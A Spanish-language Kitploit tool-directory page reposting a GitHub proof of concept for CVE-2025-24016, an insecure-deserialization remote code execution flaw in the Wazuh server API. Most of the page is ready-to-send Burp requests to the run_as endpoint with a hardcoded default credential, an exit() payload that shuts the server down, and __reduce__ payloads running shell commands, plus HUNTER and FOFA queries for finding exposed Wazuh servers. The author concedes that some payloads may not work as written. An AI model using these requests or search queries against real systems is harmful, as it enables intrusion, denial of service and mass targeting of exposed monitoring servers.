Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC — Se ha identificado una vulnerabilidad crítica de RCE en el servidor Wazuh debido a una deserialización insegura en el paquete wazuh-manager. Este error afecta a las versiones de Wazuh ≥ 4.4.0 y se ha corregido en la versión 4.9.1. | Kitploit
Herramientas/GitHubGitHub/cybersecplayground/cve-2025-24016-wazuh-remote-code-execution-rce-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHub
cybersecplayground/cve-2025-24016-wazuh-remote-code-execution-rce-poc

CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC

Se ha identificado una vulnerabilidad crítica de RCE en el servidor Wazuh debido a una deserialización insegura en el paquete wazuh-manager. Este error afecta a las versiones de Wazuh ≥ 4.4.0 y se ha corregido en la versión 4.9.1.

Ver Repositorio
26hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 Wazuh Ejecución Remota de Código (RCE) - PoC

📌 Resumen de la Vulnerabilidad

Se ha identificado una vulnerabilidad crítica de RCE en el servidor de Wazuh debido a una deserialización insegura en el paquete wazuh-manager. Este error afecta a las versiones de Wazuh ≥ 4.4.0 y se ha corregido en la versión 4.9.1.

🔍 Detalles

La falla se encuentra en la DistributedAPI de la API de Wazuh, donde la entrada controlada por el usuario se deserializa de forma insegura. Esto permite a atacantes con acceso a la API (por ejemplo, un panel o nodo de clúster comprometido) ejecutar código Python arbitrario en el servidor maestro utilizando el endpoint run_as.

📬 Prueba de Concepto (Solicitud de Burp)

POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  
Content-Type: application/json

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

📌 El encabezado Authorization es el base64 de wazuh-wui:MyS3cr37P450r.*-.

📌 El payload provoca que el servidor de Wazuh se apague al llamar al método exit() de Python.

💥 Impacto

  • Ejecución Remota de Código completa a través de la API
  • Apagado del servidor en PoC (DoS)
  • Riesgo de movimiento lateral entre clústeres de Wazuh

🛡️ Mitigación

  • ✅ Actualizar a Wazuh v4.9.1 o superior
  • 🚫 Evitar exponer la API externamente
  • 🧪 Monitorear actividad inusual de la API

✅ Ejemplo de Payload para Ejecutar whoami

{
  "__unhandled_exc__": {
    "__class__": "os",
    "__import__": "os",
    "system": "whoami"
  }
}

Pero esto por sí solo no funcionará a menos que el código de deserialización ejecute realmente el árbol de objetos. En su lugar, utilice un objeto basado en __reduce__ que ejecute código.

Aquí está el formato funcional para una solicitud de Burp usando os.system() de Python mediante una lógica similar a pickle:

💣 Payload RCE funcional para Burp (Ejecución de Código Python)

POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==
Content-Type: application/json

{
  "__reduce__": [
    "__import__('os').system",
    ["whoami"]
  ]
}

🧬 Para ejecutar ls, cambie el payload:

{
  "__reduce__": [
    "__import__('os').system",
    ["ls -la"]
  ]
}

También puede usar:

{
  "__reduce__": [
    "__import__('subprocess').getoutput",
    ["id"]
  ]
}

⚠️ Nota: La deserialización real debe ocurrir con eval() o mecanismos similares en el backend para que esto funcione. Basado en el PoC de Wazuh, esto es efectivamente posible si controlas auth_context.

🔐 Consejo Profesional Intercepte la solicitud en Burp, vaya a la pestaña Repeater y pruebe múltiples payloads como:

  • "whoami"
  • "id"
  • "uname -a"
  • "ls /home/wazuh"

👇Consulta

  • HUNTER : product.name="Wazuh"
  • FOFA : app="Wazuh"

Si la respuesta está vacía o el estado es 500, revise los registros — a veces no se devuelve la salida. 📚 ¡Manténganse afilados, hackers! ¡Más PoCs de bug bounty, bypasses y payloads están por venir!

Sigue 👉 @cybersecplayground para contenido diario de hacking!

#bugbounty #rce #wazuh #infosec #security #pentest #zeroday #exploit

Descargar herramienta